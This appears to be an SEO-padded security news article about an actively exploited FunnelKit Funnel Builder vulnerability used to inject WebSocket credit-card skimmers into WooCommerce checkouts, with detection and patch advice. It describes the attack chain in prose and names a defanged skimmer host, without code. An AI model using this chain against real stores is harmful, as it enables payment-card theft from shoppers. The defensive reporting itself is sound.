FunnelKit WordPress Bug Lets Hackers Skim 40,000+ WooCommerce Checkouts — Here’s How They Do It

A critical FunnelKit WordPress exploit is being actively used by hackers to inject credit card skimmers via this WooCommerce skimming exploit into more than 40,000 WooCommerce checkout pages targeted by the WooCommerce skimming exploit. The vulnerability, discovered in the FunnelKit Funnel Builder plugin, requires no authentication — giving attackers full control over payment flows through the WooCommerce skimming exploit. This WooCommerce skimming exploit represents one of the most dangerous e-commerce threats of 2026.

The WooCommerce skimming exploit used a novel approach that security researchers had never seen before.

What Happened

If you’re running a WooCommerce store with FunnelKit’s Funnel Builder plugin, you need to stop what you’re doing and check your site right now. A critical vulnerability in the plugin — installed on more than 40,000 WordPress sites — is being actively exploited as a WooCommerce skimming exploit in the wild to inject credit card skimmers directly into checkout pages.

The attack was first documented by Sansec, a Dutch cybersecurity firm that specializes in e-commerce malware detection. Their researchers found that attackers are exploiting an unauthenticated access flaw to plant fake Google Tag Manager scripts that silently harvest every credit card number, CVV, billing address, and personal detail that customers enter at checkout.

This isn’t theoretical. This is happening right now, and the stolen data is being exfiltrated in real time through WebSocket connections — a technique that makes the skimmer significantly harder to detect than traditional data-theft methods.

How the WooCommerce Skimming Exploit Works via FunnelKit

The attack chain is devastatingly simple, which is part of what makes it so dangerous. Here’s the step-by-step breakdown of how attackers are compromising WooCommerce stores:

Step 1: Exploit the unauthenticated endpoint. The Funnel Builder plugin exposes a REST API endpoint that fails to verify user permissions. Attackers send a crafted request to this endpoint to modify global plugin settings without needing any login credentials whatsoever.

Step 2: Inject malicious script via “External Scripts” setting. The plugin has a legitimate feature called “External Scripts” that allows site administrators to add tracking scripts (like Google Analytics or Facebook Pixel) to checkout pages. Attackers abuse this feature by injecting a script tag that loads malware from a remote server, disguised as a Google Tag Manager snippet.

Step 3: Load the skimmer dynamically. The injected script doesn’t contain the actual skimmer code. Instead, it loads a secondary JavaScript file from an attacker-controlled domain. This two-stage loading makes static analysis more difficult and allows attackers to update the skimmer payload without re-exploiting the vulnerability.

Step 4: Steal payment data via the WooCommerce skimming exploit via WebSocket. The final payload opens a WebSocket connection to a command-and-control server and transmits stolen payment information in real time as customers fill out checkout forms. Because WebSocket traffic doesn’t show up in standard HTTP access logs, many traditional security monitoring tools miss it entirely.

The FunnelKit Vulnerability: No Auth, Full Control

The root cause is an endpoint that doesn’t check whether the person making the request is actually an administrator. In WordPress development, every REST API endpoint that modifies data should include a permission_callback that verifies the user has the appropriate capability — typically manage_options or manage_woocommerce for settings changes.

The vulnerable endpoint in Funnel Builder skipped this check entirely. Any unauthenticated user could send a POST request and modify the plugin’s global settings, including the External Scripts field that gets injected into every checkout page. It’s the kind of bug that should never make it past code review, but somehow did.

The vulnerability affects all versions of Funnel Builder prior to version 3.15.0.3. As of this writing, the flaw does not have an official CVE identifier assigned, though multiple security firms are tracking it.

The WebSocket Skimmer: A New Breed of Payment Theft

What makes this attack particularly insidious is the use of WebSocket connections for data exfiltration. Traditional credit card skimmers typically send stolen data via HTTP POST requests to a collection server. These requests show up in network logs, can be caught by web application firewalls, and are relatively easy to detect with content security policies.

WebSocket-based exfiltration is different. Once the initial handshake completes, data flows through a persistent connection that looks like legitimate real-time communication. Sansec observed the skimmer connecting to wss://protect-wss[.]com/ws — a domain name deliberately chosen to look like a security service.

The skimmer is also “tailored to the victim’s storefront,” meaning attackers customize the malicious code to match each compromised site’s checkout form structure. This level of sophistication suggests an organized operation, not a script kiddie running automated scans.

Who Discovered the WooCommerce Skimming Exploit

The vulnerability was independently discovered and documented by multiple security research teams. Sansec published the initial detailed analysis of the in-the-wild exploitation, including the WebSocket C2 infrastructure. GBHackers and BleepingComputer subsequently confirmed the findings and reported additional technical details.

The speed at which this vulnerability moved from discovery to active exploitation underscores a growing problem in the WordPress ecosystem: attackers are monitoring plugin changelogs and reverse-engineering patches to find exploitable flaws before most site owners have a chance to update.

Scale of the Damage

FunnelKit’s Funnel Builder is used by more than 40,000 WooCommerce stores worldwide. These aren’t small hobby sites — they’re active e-commerce businesses processing real customer payments. Every compromised checkout page represents potentially thousands of stolen credit card numbers.

The damage extends beyond the immediate financial losses from stolen payment data. Affected businesses face PCI DSS compliance violations, potential fines from payment processors, mandatory forensic investigations, customer notification obligations, and lasting reputational damage. For small and medium-sized businesses, a single successful skimming attack can be existentially threatening.

The true number of compromised stores hasn’t been disclosed, but given that the vulnerability was exploitable without authentication and the plugin’s large install base, the actual impact is likely significant.

How to Check If You’re Affected

If you’re running Funnel Builder on your WooCommerce store, here’s what you need to do immediately:

Check your plugin version. Go to your WordPress dashboard, navigate to Plugins, and look at the version number for “Funnel Builder by FunnelKit.” If it’s anything below 3.15.0.3, you’re potentially vulnerable.

Inspect the External Scripts setting. Navigate to FunnelKit → Settings → Checkout → External Scripts. Look for any script tags you didn’t add yourself. Pay special attention to anything that references Google Tag Manager but uses an unfamiliar domain, or any script loading from a domain you don’t recognize.

Check for WebSocket connections. Open your browser’s developer tools on your checkout page, go to the Network tab, and filter by “WS” (WebSocket). If you see any WebSocket connections to domains you don’t recognize — especially anything involving “protect-wss” or similar security-sounding names — your site has likely been compromised.

Review server access logs. Look for unusual POST requests to FunnelKit REST API endpoints, particularly any that modify settings and come from unfamiliar IP addresses.

Patch and Remediation

FunnelKit has released a patch in version 3.15.0.3 that adds proper authentication checks to the vulnerable endpoint. Update immediately through your WordPress dashboard or by downloading the latest version from the WordPress plugin repository.

But updating alone isn’t enough if your site was already compromised. You also need to remove any malicious scripts from the External Scripts setting, scan your entire WordPress installation for additional backdoors, change all administrator passwords, notify your payment processor about the potential breach, and consider engaging a forensic team to determine the scope of data exposure.

If you’re using a web application firewall like Wordfence or Sucuri, make sure your rules are updated to block exploitation attempts against this specific endpoint.

Why the WooCommerce Skimming Exploit Shows Plugin Security Is Getting Worse

This isn’t an isolated incident. WordPress plugin vulnerabilities have been responsible for some of the largest web-based attacks in recent years, from the AI-assisted attack campaigns documented by Mandiant to the cPanel zero-day that hit 44,000 servers.

The core problem is structural. WordPress’s plugin ecosystem incentivizes rapid development and feature addition, but doesn’t enforce meaningful security review before plugins are listed in the official repository. Plugin developers are often small teams or solo developers who may lack security expertise. And site owners frequently install plugins without understanding the attack surface they’re adding.

The FunnelKit vulnerability — a missing permission check on a settings endpoint — is one of the most basic categories of web application security flaws. The fact that it made it into production in a plugin used by 40,000+ e-commerce sites speaks to systemic gaps in the WordPress plugin development and review process.

Final Thoughts

The FunnelKit exploit is a textbook example of how a simple vulnerability can cascade into a massive security incident. An unauthenticated settings modification led to JavaScript injection, which led to real-time credit card theft across potentially thousands of WooCommerce stores. The use of WebSocket-based exfiltration and a domain disguised as a security service shows that e-commerce attackers are getting more sophisticated in their techniques.

If you run any WooCommerce store — whether you use FunnelKit or not — this should be a wake-up call. Audit your plugins, enable automated security scanning, and never assume that a plugin from the official WordPress repository is secure by default. The attackers certainly aren’t making that assumption.

How the FunnelKit WordPress Exploit Compares to Past WooCommerce Attacks

The FunnelKit WordPress exploit follows a disturbing pattern of supply chain attacks targeting e-commerce platforms. In 2024, the Dessky Snippets plugin attack used a similar approach, injecting payment skimmers via seemingly legitimate WordPress extensions. The Sucuri security research team has documented over 300 unique skimming scripts targeting WooCommerce stores since 2023.

What makes the FunnelKit vulnerability particularly dangerous is its position in the checkout funnel. Unlike generic WordPress malware that targets login forms or admin panels, this exploit specifically intercepts payment data at the most sensitive point in the customer journey. According to Wordfence threat intelligence, checkout-stage attacks have a 4x higher success rate than traditional credential harvesting because customers expect to enter sensitive data at that point.

Store owners running WooCommerce with FunnelKit should audit their checkout pages immediately using browser developer tools. Look for unexpected JavaScript includes, especially any code making external network requests to unfamiliar domains. The WordPress Plugin Security Handbook provides detailed guidance on vetting plugin code integrity.